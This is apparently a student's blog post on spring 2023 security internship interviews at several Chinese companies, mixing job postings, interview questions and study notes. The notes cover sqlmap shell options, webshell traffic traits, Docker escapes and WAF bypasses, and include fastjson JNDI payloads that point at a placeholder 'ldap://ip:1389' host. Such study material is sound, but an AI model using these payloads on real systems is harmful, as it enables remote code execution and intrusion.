2023春 实习面经和我的准备(上)

2023春 日常实习面试准备

顺丰科技(信息安全工程师,校招储备)

jd

岗位职责:
1、负责主机、数据库、中间件、网络、存储和终端的信息安全基线标准制定与符合性检查,以及上述工作所需支撑工具与系统的开发和维护;
2、负责集团各应用系统的安全评估,检查软件开发中信息安全要求的落实情况,预防应用系统安全漏洞;
3、开展网络流量及系统日志记录、采集及分析工作,运用大数据技术,制定防控策略,发现并与恶意行为开展对抗工作;
4、负责集团信息安全管理体系的运行及优化,保障集团信息安全,支持政府监管部门与客户对信息安全的需求。
岗位要求:
1、本科及以上学历,信息安全、计算机科学相关专业;
2、具有基本信息安全知识,热爱信息安全行业,熟悉常用安全测试软件和平台的使用,如WVS、Appscan、burpsuit、Kali等;
3、掌握主流操作系统、数据库、网络设备的配置及使用,掌握一种或多种编程或脚本语言,如C、C++、java、Python、Perl等;
4、具备良好的沟通、协调和解决问题的能力,能承受一定压力,善于学习和积累。

面经

牛客网 - 找工作神器|笔试题库|面试经验|实习招聘内推,求职就业一站解决_牛客网 (nowcoder.com)

顺丰科技实习生面试(信息安全实习生:一面技术面+二面hr面)_牛客网 (nowcoder.com)

知识储备

(漏洞的知识点包括 条件,原理,利用,防御,绕过)

  • owasp top 10 (2022):

sql注入、失效的身份认证和会话管理、 XSS、直接引用不安全的对象、安全配置错误、敏感信息泄露、缺少功能级的访问控制、CSRF、使用含有一直漏洞的组件、未验证的重定向和转发 的漏洞原理,防御姿势

失效的身份认证和会话管理 的原理:

在开发web应用程序时,开发人员常常会建立自定义的认证和会话方案。但是要正确的实现这些方案却是很难的。结果就在退出、密码管理、超时、密码找回、帐户更新等方面存在漏洞

防御:

对最终用户帐户使用帐户锁定策略。

限制会话寿命。
避免未经授权访问会话状态。

xss分类,注意dom型,就是注入后的代码可以控制dom对象,让客户端且执行,DOM-XSS攻击原理与防御 - Mysticbinary - 博客园 (cnblogs.com)

xss防御:

httpOnly,js无法读取cookie

Domain,同源策略

对输入过滤

对输出进行实体编码

直接引用不安全的对象的原理:在基于用户提供的输入对象进行访问时,未进行权限验证,往往被称为“越权”,

越权漏洞挖掘:[如何发现更多的IDOR漏洞(越权漏洞) - 腾讯云开发者社区-腾讯云 (tencent.com)](https://cloud.tencent.com/developer/article/1562472#:~:text=IDOR漏洞介绍. IDOR,Insecure Direct Object reference,即”不安全的直接对象引用”,场景为基于用户提供的输入对象进行访问时,未进行权限验证。.,IDOR漏洞其实在越权(Broken Access Control)漏洞的范畴之内,也可以说是逻辑漏洞,或是访问控制漏洞,国内通常被称为越权漏洞。. 具体可点此参考。. 然而,IDOR漏洞并不像增减和切换数字ID号那样简单,随着应用程序的功能 )

  • 挖过的一些漏洞

通用型:

codefever远程命令执行

orrs 任意文件包含+远程命令执行

dreamerCMS 后台任意文件读取

  • 渗透测试的经验

比如说渗透流程

目标确认、信息收集、漏洞发现、漏洞利用、权限维持内网渗透、目标获取痕迹清理

信息收集:

1子域名扫描,域名查询ip,ip反查询域名;

2针对机器的话,扫描端口找web服务

3针对web服务,如果是网站,可以扫描目录,找后台页面试弱口令,找源码泄露利用并工具获取敏感信息,识别网站服务端语言,版本,找到对应的版本漏洞

漏洞发现利用:

1使用公开版本漏洞:可以用poc或者自动化工具验证

2经典漏洞:看看有没有相应特征,然后sql,xss,文件上传等等

3弱口令

4找源码审计0day

内网渗透:

  • 安全工具的使用(xray,sqlmap,awvs等

image-20230211172201410

0 burpsuit

尽量引导面试官问burp吧

1 sqlmap

sqlmap详细使用教程_星落.的博客-CSDN博客_sqlmap

-u url

--method 指定post/get

--data 手工post数据

-r file.txt 读取本地指定的http请求报文file.txt进行测试 (可以用*号指定,然后可以注入)

-A 指定UA

--cookie 指定cookie

--dbs

-D

--tables

-T

--columns

-C

--os shell

2 xray

和他说谷歌代理就可以用

goby+xray 联动

3 awvs

Awvs详细使用教程_awvs使用教程_内网漫游-网安人的梦的博客-CSDN博客

Targets功能:目标,可以对扫描的目标进行添加,可以单个添加,可以多个添加或者按组添加;

Vulnerabilities功能:漏洞排序功能,对扫描出来的漏洞从高危到低位降序排列;

Scans功能:扫描,可以新建扫描(自己可以配置扫描的参数),可以直接看到扫描记录;

Reports功能:可以对扫描的报告进行导出;

Discovery功能:字面意思是发现,可以进行设置,有包含一些地址和组织的功能需要自己手动添加,也有排除一些地址和组织的功能,需要自己手动添加;

4 goby

Targets功能:目标,可以对扫描的目标进行添加,可以单个添加,可以多个添加或者按组添加;

Vulnerabilities功能:漏洞排序功能,对扫描出来的漏洞从高危到低位降序排列;

Scans功能:扫描,可以新建扫描(自己可以配置扫描的参数),可以直接看到扫描记录;

Reports功能:可以对扫描的报告进行导出;

插件 xray msf

  • CSRF的防护

跨站伪造用户进行请求

防御:

1通过referer判断页面来源进行CSRF防护,该方式无法防止站内CSRF攻击及referer字段伪造。

2重要功能点使用动态验证码进行CSRF防护。

3通过token方式进行CSRF防护:(CSRF-Token)CSRF防御之token认证_. . . . .的博客-CSDN博客_csrf防御token

  • 蚁剑菜刀冰蝎异同

相同:都是用来连接 Web Shell 的工具
不同:冰蝎有流量动态加密

菜刀

菜刀 webshell 只使用了 url 编码 + base64 编码
shell 特征就是传输参数名为 z0,还存在int_set("display_erros","0")字符串特征

蚁剑

默认的蚁剑 shell,连接时会请求两次,其请求体只是经过 url 编码,其流量中也存在和蚁剑一样的代码
第一次请求,关闭报错和 magic_quotes,接下来去获取主机的信息
第二次请求,会把主机目录列出来

冰蝎2.0

使用 aes 加密发起三次请求
第一次请求服务端产生密钥写入 session,session 和当前会话绑定,不同的客户端的密钥也是不同的
第二次请求是为了获取 key,第三次使用 key 的 aes 加密进行通信

冰蝎3.0

使用 aes 加密发起两次请求
3.0 分析流量发现相比 2.0 少了动态密钥的获取的请求,不再使用随机生成 key,改为取连接密码的 md5 加密值的前 16 位作为密钥
一次请求为判断是否可以建立连接,少了俩次 get 获取冰蝎动态密钥的行为,第二次发送 phpinfo 等代码执行,获取网站的信息

哥斯拉

支持 n 种加密
采用了和冰蝎 3.0 一样的密钥交换方式,哥斯拉建立连接时会发起三次请求,第一次请求数据超级长,建立 session,第二三次请求确认连接

自我介绍

项目:

hw项目

渗透

自研工具jndi

代码审计出3个day

CTF, 学会了SQL注入...

需要准备的:

  • jndi利用姿势,高版本如何绕过?

jdk<8u131

createRegistry()

reference

referrenceWrapper

bind

jdk>=8u131

javaSerializeDate 反序列化本地序列化链

El Elprosser#eavl()

SnakeYaml

GroovyShell#evaluate()

GroovyClassloader

Xstream

mvel2 ShellSession

Mlet

  • fastjson利用姿势,高版本如何绕过?

1.24:

fastjson 本地反序列化

fastjson jndi rmi

1.25

保护方式:开启autotype了

攻击:法1,想办法关闭autotype

​ 法2,json内置

1.2.41 以"L"开头、以";" 类就被加载

1.2.42 双写绕过

1.2.44 json内置

1.2.47 结合JNDI注入找组件(loadClass中默认cache为true,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.jdbcRowSetlmpl这个类,即可绕过黑名单)

1.2.66 基于黑名单绕过

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://ip:1389/Calc"}{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip:1389/Calc"}{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip:1389/Calc"}

1.2.68

新增加一个safeMode,只要开启,在checkAutoType的时候会直接抛出异常,所以是无法攻破的

真实面试

一面

纯讲项目经历

问了校内成绩

二面

自我介绍
挖的洞介绍
自动化漏洞挖掘接触过吗
有跟过什么新的0day吗
log4j调过吗

log4j除了rce还有什么其他利用

内存马有研究吗
怎么检测内存马
内存马检测怎么绕过,有收集这些trick吗
类似于shiro这些攻击的流量是经过加密的,有分析过吗
最近在做些什么呢
能工作多久
喜欢挖掘漏洞,二开源码,应急监控那种多点

三面

hr面,通过了,但是不知道为什么在给我发offer走流程的时候,忽然和我说要把岗位留给23届的,希望我可以接受这次变更,并且信口开河,声称我秋招的时候可以免试入职,交换了微信并且有后续岗位会及时联系我...

结论是不签合同之前一切都不能相信

offer

字节-安全实习生-云原生方向

jd

职位描述

1、参与云原生平台下的攻防靶场搭建、模拟渗透攻击、安全产品威胁检测评测;

2、参与客户安全运营、安全日志/告警应急响应排查,完整攻击根因溯源,反馈产品能力改进;

3、参与云原生先进性技术(包括但不限于CEP多事件关联、threatGraph自动化研判、专项威胁情报、业界先进性技术追踪)开发、预研、落地。

职位要求

1、23年及以后毕业的本科生或硕士生,22届保研/留学的本科生,计算机、信息安全等相关专业;

2、熟悉CTF、HW攻防、BAS模拟渗透攻击、红蓝对抗等攻防实践;

3、熟悉Python、Shell、Yara、Lua或Go语言;

4、每周实习4天及以上,可连续实习3个月及以上;

加分项:

1、熟悉逆向分析、恶意软件分析、高级威胁分析;

2、熟悉Linux操作系统、容器安全工作原理;

3、有CVE漏洞挖掘与分析能力;

4、对安全攻防技术有持续性热情与好奇心。

面经

知识储备

  • docker原理:

Docker 利用 Linux Namespace 进行网络、用户、进程等不同资源的隔离,使用 Linux Cgroups 技术对资源的使用进行限制与监控,通过 AUFS 等存储驱动实现分层结构与增量更新等功能。通过Union-FS进行镜像分层存储,极大的提高了利用空间

  • docker有哪些风险

1镜像风险

引用不安全的组件

引用不安全的docker镜像

敏感文件泄露

2容器风险

不安全的容器应用

不受限的资源共享

不安全的配置和挂载

3容器管理程序接口的风险

UNIX socket 之 普通用户被加入到docker组(使用普通用户创建一个 privileged 为 true 的容器,在该容器内挂载宿主机硬盘并写入定时任务,然后将宿主机的 root 权限反弹回来)

UNIX socket 挂载到容器内部

  • 容器逃逸

cve-2019-5736 攻击runc

privillage

挂载docker socket

挂载procfs

脏牛漏洞

api未授权访问

自我介绍

hw项目

代码审计出3个day

CTF, 学会了node、SQL注入...

渗透

自研工具jndi

真实面试

一面

自我介绍

答:hw,渗透,ctf,0day,工具

调试过的比较知名的cve?利用流程,危害,防护

答:讲了log4j

我们知道log4j的jndi注入有比较明显的数据特征,有什么方法绕过吗

答:基本不会,讲了ssrf可以本地访问绕过防火墙,或者shiro可以加密流量

docker逃逸或者docker的漏洞了解过吗,讲讲你熟悉的

答:列举了各种docker漏洞吧,其中提到了脏牛

脏牛有调试过吗

答:不会,只是复现

Docker runC 容器逃逸漏洞(CVE-2019-5736)

会linux吗

linux用过啥命令

xargs用过吗

grep用过吗

管道 | 用过吗

管道的原理

fd 3、4是啥

开发你会啥编程语言

python

map底层的数据结构

map和list区别

学过数据结构吗

红黑树会吗

手写下冒泡排序

实际开发中你会哪些编程语言?从c++,java,python,go选一个

python中怎么调用c的函数

python怎么调用系统

python多线程

python网络请求

内存马

绕waf

哪些厂商的防火墙你用过或者绕过的

终端安全有哪些产品

问了一些后渗透,内存马注入后会怎么做?如何拿下域控?

如果是一个linux环境,内存马注入后你会怎么进行后续的利用?

反问环节:你们具体是做什么工作

火山引擎的开发,针对字节云的服务测安全,终端安全,云原生安全这些,以及恶意样本分析等等

二面(等待补充)

很奇怪,一面我觉得面得并不好,但是很快通过了,后面二面按照旁听者说法是只答对了10%,果然面完就泡池子了

友情提示:二面绝大部分涉及计算机基础知识(linux,脚本语言开发相对多)

等待补充

不匹配

安恒【代码审计实习-分子实验室转正实习生】

jd

岗位职责:
1.跟踪和分析业界最新安全漏洞;
2.挖掘Java、PHP程序中未知的安全漏洞和代码缺陷,并对漏洞进行验证,编制安全加固报告;
3.主要参与新服务、新技术创新服务的研究。
任职要求:
1.24届毕业生,对JAVA/PHP编程有较深入的了解,具备较强的Java/PHP代码审计能力,有丰富实战能力;
2.熟悉JAVA/PHP主流框架,具备有一定的编程能力;
3.深入理解常见安全漏洞产生原理及防范方法;
4.熟练掌握源代码测试工具及测试流程,有CNVD、CNNVD等漏洞证书、CVE或CTF比赛获奖者者优先。
5.熟悉主流的源代码审计工具;
6.思路清晰,具有优秀的分析、解决问题的能;力,有良好的学习能力及团队协作能力;
7.具备较强的沟通能力、抗压能力,团队合作精神及钻研精神。

面经

别人的面经 (wolai.com)

一名2023届毕业生的安全岗面试题及面试经验分享 - FreeBuf网络安全行业门户

代码审计流程

自我介绍

代码审计出3个0day(codefever , dreamercms)

ctf,获奖如西湖论剑线上第7,学到了些sql,

写了个jndi工具

渗透

hw

知识储备

代码审计流程思路

Rips,seay

Fortify

tabby,codeql

javaWEB三件套(javaweb三大组件)及其功能
Servlet的任务有:

接收请求数据:我们都知道客户端请求会被封装成HttpServletRequest对象,里面包含了请求头、参数等各种信息。
处理请求:通常我们会在service、doPost或者doGet方法进行接收参数,并且调用业务层(service)的方法来处理请求。
完成响应:处理完请求后,我们一般会转发(forward)或者重定向(redirect)到某个页面,转发是HttpServletRequest中的方法,重定向是HttpServletResponse中的方法,两者是有很大区别的。

filter四种拦截方式

REQUEST:直接访问目标资源时执行过滤器。包括:在地址栏中直接访问、表单提交、超链接、重定向,只要在地址栏中可以看到目标资源的路径,就是REQUEST;
FORWARD:转发访问执行过滤器。包括RequestDispatcher#forward()方法、< jsp:forward>标签都是转发访问;
INCLUDE:包含访问执行过滤器。包括RequestDispatcher#include()方法、< jsp:include>标签都是包含访问;
ERROR:当目标资源在web.xml中配置为< error-page>中时,并且真的出现了异常,转发到目标资源时,会执行过滤器。

cc1-7挑一个你熟悉的反序列化链:

image-20230224160250122

waf绕过思路:(30条消息) WAF绕过思路整理(挺全)_J0hnson666的博客-CSDN博客_爬虫绕过waf屏蔽

比如asp+iis的环境使用%饶过,在WAF层可能解析出来的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。

php+apache畸形的boundary
php在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为----aaaa,123456,php解析的时候只识别了----aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现BYPASS

四层模型

image-20230224160500051

分块传输

https://johnfrod.top/%E5%AE%89%E5%85%A8/862/

oracle,msssql的getshell

oracle:(30条消息) Oracle注入 - 命令执行&Shell反弹_PD_3569的博客-CSDN博客_oracle getshell

msssql xp_cmdshell

登录框怎么测试:

https://www.cnblogs.com/linuxsec/articles/11519196.html

php危险函数:

真实面试

一面

自我介绍

问了一下熟悉php还是java

介绍一下你挖的0day,php一个,java一个

介绍一下你的工具

要求你rce,你可以想到什么方法,想到什么就说什么,一直说下去

答:我回答了危险的rce函数,文件上传、文件包含造成的rce , 攻击数据库造成的rce(mysql,redis),利用框架组件历史漏洞造成rce,反序列化造成rce,编辑模板造成rce,xxe造成rce (但是面试官仍然鼓励我继续说下去,然而我没有想到还能怎么rce了)(补充:其实还可以ssti造成rce)

xxe如何造成rce

这个我答的不好,搞错成盲外带xxe加载远程dtd了,其实应该说expect://cmd

给你一份php代码,要求你挖出rce,你要怎么挖,给你一份java代码呢

php和java框架的漏洞讲讲

讲一个最近比较火的漏洞,分析?

一开始讲了log4j,结果他问还有没有,我讲了weblogic那个

反射,加载,代理的基本原理?

java命令执行的有多少种方式

java文件包含和php文件包含区别

如果给你一份不熟悉的编程语言写的代码如何进行审计

二面

自我介绍

java熟悉到什么程度,底层的那些代码调试过吗

mvc怎么理解,像底层的一些接口比如说brabrabra有没有关注过,还是说以操作为主

内网熟悉吗?黄金票据白银票据有什么区别

问你一个简单的哈,讲一下内网横向的一些技术

反序列化调过哪些

(这里答的不好,一时半会只说了cc,rome, fastjson, snakeYaml ,还有很多很多没说)

你觉得fastjson这种反序列化和其他的反序列化有什么差别,说说你的理解

docker逃逸知道是吧,展开说说

刑,我这样问,假如给你一个k8s的节点的权限,你怎么去后渗透

差不多没什么问题了,你什么时候可以入职

答:这里我一开始和他说5-6月,想试探一下,果不其然他表示非常遗憾,因为他手头的简历不少,这么晚的话时间成本太高了,然后和他大概互相试探了一下,最后我改说自己3-4月可以入职,他说倘若如此他可以考虑

做过红队吗

答:这个时候我很犹豫,如果说没的话可能就直接挂了,然后我折中了一下,就说和师兄打过一些红队的项目,主要还是类似渗透,ctf为主的那种(感觉应该叫打点?)

看你很多获奖荣誉啊,你这个是独立获奖还是团队?

答:团队居多

主要负责哪块

答:web安全

然后他说广东强网杯线下他也去过,当时他们拿1了,问我们是不是后面线下拿了第5,最后和他争辩了一下,让他意识到那次是我第一次线下没有拿到名次,原因是那个时候刚刚开始学web安全(他大概会有点失望,因为他一开始以为我是pwn爷555)

应急溯源流程讲一下

假如没有态势感知你怎么防御

答:这里答得不好,

从你刚刚回答的java的那些和内网的这个啊,我大概知道你是什么水平啊,后面我们讨论一下再和你沟通,你有没有什么要问的

反问环节:

我当时问了他们部门是不是偏红队方向,部门的一些工作职责,然后他就说他们主要是反apt,然后就说你进来的话,我们现在还在犹豫要把你放在哪个位置(忽然就又扯到我了),除此之外,我们的工作比较像红队,然后有人带,并且我们这个反apt它的知识面是很广的,可能成长什么的会快很多,我个人觉得啊,毕竟有人给你指点。除了这个以外我们还会出几个人去打比赛,就像广东强网我们出了3个去打线下拿了

最后反问的话感觉和别的技术面不太一样,总之和他聊了一些吧,他指出我的内网和java这块还是和我想象的有差距,到时候和同事讨论一下去留问题,然后也问了我有没有面其他家,我就讲了一下顺丰offercall后被拒,微步发offer,然后现在更倾向于来安恒,毕竟深圳近一些,他说其实可以多投投几家找更合适自己的,然后聊到了大三,他问我会不会影响学业不能毕业啥的,我说当然不会,他笑笑然后结束了

offer

微步【安全实习生-漏洞库的维护】

jd

工作职责:
• 安全产品的漏洞库能力持续运营
• 追踪国内外最新的漏洞,收集漏洞威胁情报以及漏洞分析入库
• 把漏洞库的能力向外输出和维护
• 你需要不断配合团队,参与完善漏洞体系建设
能力要求:
• 有安全基础,熟悉常见漏洞原理及漏洞相关的行业术语、协议、标准等。如CVSS、CVE、CNVD、CNNVD、CPE、CWE、NVD;
• 有着良好的文字功底和图文编排能力,能熟练阅读英文资料
• 极度热爱安全这件事,对漏洞行业热点有敏锐的洞察力。喜欢漏洞,谈起来眼睛里能放光
• 性格皮实,不玻璃心,沟通积极
加分项:
• 熟练掌握一门编程语言,能够解决基本的自动化问题
• 熟悉常见Web安全漏洞,理解常见漏洞的原理、危害、修复
其他:
23年校招生暂无转正HC

面经

知识储备

python实现多线程

(33条消息) WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)_zxl2605的博客-CSDN博客

tcp三次握手,四次挥手

  • 网页状态码

    • 1** - 信息,服务器收到请求,需要请求者继续执行操作
    • 2** - 成功
    • 3** - 重定向
    • 4** - 客户端错误,请求包含语法错误或无法完成请求
    • 5** - 服务器错误,服务器在处理请求的过程中发生了错误
  • linux下rws权限中s是什么意思
    这个之前真没听说过。好像是root权限。

  • linux替换文本用什么,具体命令
    我知道是用sed,但参数过于晦涩,不常用根本记不住。

  • linux计划任务
    crontab

  • linux下last, lastb命令
    知识盲区。感觉我不太会了,就开始问windows。

  • Windows 查看过登录日志么

  • Windows 查看进程表,如何修改注册表
    tasklist,netstat

att&ck

初始访问,执行,持久化,权限提升,防御绕过,票据访问,发现,横向移动,收集,命令和控制,数据渗透,影响

SOC

【面试笔记】SOC面试常见问题与回答-网络攻防学习社区-安全圈子-FancyPig's blog (iculture.cc)

CVSS、CVE、CNVD、CNNVD、CPE、CWE、NVD

CVE:公开漏洞披露

CNVD:国家信息安全共享平台

CNNVD:国家信息安全漏洞库

CVSS:通用漏洞评估方法

NVD:美国国家漏洞库

CWE:通用弱点

CPE(Common Platform Enumeration):通用平台枚举

jsonnp漏洞:

(33条消息) 【漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解_jsonp漏洞的描述和危害_白丁Gorilla的博客-CSDN博客

自我介绍

漏洞挖掘交过cve

护网

渗透,副会长,维护漏洞库,定时输出漏洞报告

自研工具jndi

CTF, 学会了node、SQL注入...

真实面试

一面

java熟悉吗,讲讲常见框架

system啥啥的java反序列化分析过吗

答:没

讲讲你熟悉的反序列化链

答:我讲了cc6

cc这种反序列化其实很多方法都可以的,但是现在安全性已经提升不少了,希望你可以关注一些更新的反序列化,看你写了0day挖掘,你挖过啥

答:codefever .... dreamerCMS ...

看你的这个漏洞挖掘的思路更倾向于搜索危险函数,然后对他的参数进行回溯,这个思路比较基础,往往大型的目标安全性比较强你是挖不到的,你可以看看他的一些配置之类的,比如说nginx配置不当等等

答:然后我马上补充了一下主要功能点的逻辑洞挖掘之类的

你说你维护过学校的漏洞库,可以讲一下是怎么样的吗

答:就是一些学校资产的src漏洞的收集整理,还有最新的资讯漏洞进行整理,用的飞书(模仿r3的)

我基本没什么问题了,那我问一些概念性的东西,你知道cwe吗

答:common weak,一些常见的弱点披露,网上有个网站以json的格式进行归类了

cwe就是一个弱点平台嘛,很多利用方式它的分门别类的记录下来了,ok,那我问你cvss你知道是什么吗

答:scoring system,漏洞的评分系统,很多的cve漏洞都有一个关于其风险程度的评分

ok,那你知道cvss3.0标准吗(我:面露难色),算了,你知道cvss3.1的标准吗,就最新的,举一些它的指标就行

答:最近才了解到的,还在学

ok。我没啥问题了,hr有没有和你说过我们的业务

答:有一些简单的描述,就是收集漏洞威胁情报,然后对他进行归档分类,维护漏洞库这样

嗯嗯,除了这个收集威胁情报归档,还有第二个是针对用户对漏洞库提出的需求进行改进,第三个是安研,对一些最新情报进行一个甄别,复现写报告,补充内容。欧克。后面还有一次技术面,然后hr就会直接和你对接,面试结果2-3天就有,最迟不超过7天的

随后面试官问了能实习多久

二面

面试官:我是跨部门面试,你是啥岗位的?红队过来的还是渗透过来的?

我:懵逼

面试官:上一个面试官有和你说吗

我:他没有自我介绍

面试官:emmm,那行吧,咱先面着,你自我介绍一下

我:brabrabra

面试官问了一下0day,然后我讲了一下

面试官:看到你还有jndi高版本的工具,你讲讲jndi高版本怎么绕呗

面试官:那rmi怎么绕过呢

面试官:那register的怎么利用呢

面试官:说说你比较熟悉的框架漏洞吧

我:shiro,spring

面试官:讲讲shiro550咯

面试官:shiro550如何绕过waf

面试官:shiro550如何有一些流量字符串特征吗

我:应该是有的,记得开头的往往是r00txxxxx,虽然是先经过base64和aes,但是仍然开头有一个流量特征

面试官:JEP290怎么说

我:我知道是反序列化没调过

面试官:yso用过吗?讲一条熟悉的链子

我:经典cc,并且讲了cc3中yso和我自己构造的时候不太一样的地方

面试官:你的工具有什么创新点吗

我:高度可自定义化,随便你加内存马,通过不同路由随时加载各种poc

面试官:内存马讲讲

我:servlet,listener,valve,还有就是增强字节码的agent内存马

面试官:内存马熟悉吗,讲讲
我:Servlet,listen,valve,agent
面试官:内存马讲一个你熟悉的?
我:javaagent内存马,讲了一下哪个类可以进程注入
面试官:agent内存马的那个jar包是用工具实现的还是怎么造的
我:手撕的,讲了一下那些文件,INF,打包
面试官:agent内存马注入进程是哪个函数呢
我:说了好像是哪个load函数

面试官:讲一下你hw的项目经历

我:brabrabra

面试官:有没有别人打进来的情况,讲讲是怎么应急的

我:开始yy

面试官:看你分析过tcp,smtp流量,讲讲报文格式?

我一开始错答成了wireshake如何对tcp流量进行追踪和分析,三次握手四次挥手,经过提示后,大致描述了以下他有一些标志位,上面还有序列号seq,下面是正文

面试官:熟悉php还是java多点

我:相对来说php多点吧,毕竟接触久

面试官:hhh,是不是ctf打多了,来来,sql和文件上传的一些绕过讲讲

我:过滤逗号,空格,关键字怎么绕过... 文件上传讲了.htaccess,content-type,GIF89a,简单的php webshell免杀, 上传phar文件后反序列化

面试官:嗯嗯,那熟悉php webshell免杀吗

我:取反,异或,中文,php自增,加密写文件

面试官:文件上传如果不是php的,你能想到哪些通用的绕过

我:讲了一些解析漏洞,比如后缀加空格,后缀加未知文件后缀

面试官: okk,看到你上面写着sql,应该不止是数据库的使用吧,哦哦,还redis,能讲讲redis怎么利用吗

我:未授权,写webshell,主从rce绕过disable_func限制,然后讲了之前redis日学校内网绕waf的故事,还是这个好吹

面试官:刑,域渗透了解过吗

我:(慌的一批,怎么这个岗还有内网安全),然后说自己跟着null战队的内网渗透体系建设那本书一起学了,搭建过域控,然后写过定时任务提权,特别举了当时复现的情景(拿2345安全卫士提权 狗头)

面试官:burp会用吗,知道怎么抓response包吗

我:答不上

面试官:没啥问题了,反问

我:你们部门是做什么的

面试官:你具体是哪个部门还得问问hr, 我这跨部门面试你懂的,我们公司的话呢,一个是红队/攻击方向,一个是安全开发,一个是做产品的,一个是写策略规则这块

二面通过,offercall, 入职,base成都(555怎么又西漂了。。。)

Neldtv - 深圳国家电视实验室

jd

自我介绍

参加过hw

挖掘过cve

有一些渗透经历

写过一个jndi注入工具

知识储备

由于是偏二进制和密码的岗位,所以我在火车通勤路上看了下操作系统的mooc

真实面试

一面

自我介绍

cve挖掘详细介绍一下

看你是主攻web,除了web以外其他方向有深入过吗

我这里直接回答了比较少深入

看你写加入国际战队打比赛,有打过一些什么知名的国外比赛吗

我回答了wmctf和typoconctf,但是显然面试官没有听说过,然后我急忙补充了下打过国内的知名比赛如强网,鹏城杯,西湖论剑,面试官感觉最后确认了我是主要和他们专研web方向的

你们打ctf手上是拿着0day打的还是打的很多nday的

由于我雀氏水平有限,我打的比赛只有极少数是0day题并且最后赛后可以自己研究出来的,所以我就讲了一下西湖论剑我最后虽然比赛没有做出但是赛后自己挖了个day的故事,然后和面试官说绝大部分ctf题都是很多nday结合在一起,主要考察的是选手同时掌握多个nday并且能够在实战环境下把他们都审计出来

看你写了靶场搭建,讲讲

我讲了ctfd搭建,vm虚拟机靶场搭建等,最近正在学k8s

看你写了容器逃逸,讲讲

讲了一些简单的容器逃逸

你可以独立写exp吗

这必须得会吧,不然怎么交的cve和flag(bushi),然后我和他说我拿我codefever那个day写了个exp,只要传个url进来就可以弹shell

看你不是网安专业?平时如何学习安全知识

讲了下协会和指导老师

英语水平如何

四级,害,还是菜了

基本上讲项目没有问具体问题(可能因为是web吧,不对口...),只能说hr或成最大赢家

二面

不是很记得了,大概就是问了一下漏洞挖掘的经验,以及交cve的过程

然后问了一下其他方向(如二进制)会不会

问了在校成绩

然后就没什么问题了,进入反问环节的时候,发现他们现在主要是需要我负责物联网设备的web端安全,如果我对二进制感兴趣的话以后可以考虑终端安全

hr面和二面是一起的,随后和hr交流了待遇等等问题,了解到neldtv有独立办公大楼,有食堂,朝9晚5,中间12-1还可以休息,可以说很国企,在校招网上看到薪资其实是20k,本次实习可以转正,和他约在了7月15入职

offer

美团 -【转正实习】安全工程师

岗位职责

负责公司的安全攻防能力建设,以下方向任选其一。

【Web应用安全方向】

1.负责公司应用安全生命周期的安全建设落地和运营;

2.负责公司黑盒扫描平台规则运营和优化;

3.负责公司白盒代码扫描平台的运营和优化;

4.负责跟踪业界安全攻防动态,追踪最新安全漏洞,进行研究分析。

【安全运营方向】

1.负责美团各类安全告警的运营及事件应急、排查,跟进相关风险修复;

2.负责美团安全攻防能力建设,包括日志/漏洞/后门分析,安全检测策略和模型的开发设计等;

3.负责美团资产域内各类型安全漏洞的修复推动及相关平台、数据能力建设;

4.负责前沿安全技术研究,并通过攻防演练等方式进行风险评估及提供防御建议。

【移动安全方向】

负责移动端各平台(Android/iOS/小程序/H5等)攻防体系建设,内容涵盖移动端安全组件开发、设备风险识别、程序分析、漏洞及隐私合规检测等领域。

【云原生安全方向】

1.云原生安全研究,跟进业界云原生安全的最新研究成果,包括kubernetes、docker、linux系统等的安全攻防研究,并能够基于最新研究成果进行创新;

2.云原生安全研发,将研究成果转化落地,形成安全产品或能给业务方提供技术支持,保障云基础设施安全可靠运行。

【系统安全方向】

1.负责程序自动化漏洞挖掘能力的研究和能力建设;

2.负责程序行为分析技术的研究和能力建设;

3.负责美团内部业务漏洞挖掘、漏洞分析和漏洞利用,并进行能力沉淀;

4.负责AI和系统安全结合方向的研究,并将研究成果落地,解决实际业务问题。

【数据安全方向】

1.负责面向公司内及生态的数据安全技术体系建设和设计,包括不限于数据资产地图、UEBA、SIEM、API安全、数据加密、EDR、零信任等;

2.负责跨部门、跨公司推进数据安全技术方案及相关工具的落地及运营;

3.推进数据安全风险量化体系、响应机制及风险处理绩效考核。【移动安全方向】

负责移动端各平台(Android/iOS/小程序/H5等)攻防体系建设,内容涵盖移动端安全组件开发、设备风险识别、程序分析、漏洞及隐私合规检测等领域。

【云原生安全方向】

1.云原生安全研究,跟进业界云原生安全的最新研究成果,包括kubernetes、docker、linux系统等的安全攻防研究,并能够基于最新研究成果进行创新;

2.云原生安全研发,将研究成果转化落地,形成安全产品或能给业务方提供技术支持,保障云基础设施安全可靠运行。

【系统安全方向】

1.负责程序自动化漏洞挖掘能力的研究和能力建设;

2.负责程序行为分析技术的研究和能力建设;

3.负责美团内部业务漏洞挖掘、漏洞分析和漏洞利用,并进行能力沉淀;

4.负责AI和系统安全结合方向的研究,并将研究成果落地,解决实际业务问题。

【数据安全方向】

1.负责面向公司内及生态的数据安全技术体系建设和设计,包括不限于数据资产地图、UEBA、SIEM、API安全、数据加密、EDR、零信任等;

2.负责跨部门、跨公司推进数据安全技术方案及相关工具的落地及运营;

3.推进数据安全风险量化体系、响应机制及风险处理绩效考核。

任职要求

1.有信息安全、计算机科学、统计学、数学等相关学历及专业背景;

2.熟悉主流的网络攻防技术和原理;

3.至少熟悉Python、Java、Go中的一门语言,有过至少一门语言的开发实践;

4.熟悉业界安全攻防动态,追踪最新安全漏洞,能够分析漏洞原理和实现PoC编写;

5.能够无障碍阅读英文技术文献;

6.逻辑清晰、表达能力强,有良好的团队合作精神和主动沟通意识。

具备以下经验者优先

1.有大型互联网企业安全实习经验;

2.发表过有深度的技术文章或独立挖掘过知名开源应用/大型厂商高危漏洞经历;

3.有大型CTF比赛(DEFCON,XCTF etc)获奖经历;

4.有大数据分析相关经验,了解Hadoop、Storm等使用;

5.熟悉AI主流算法适用场景和调参,有实践经验;

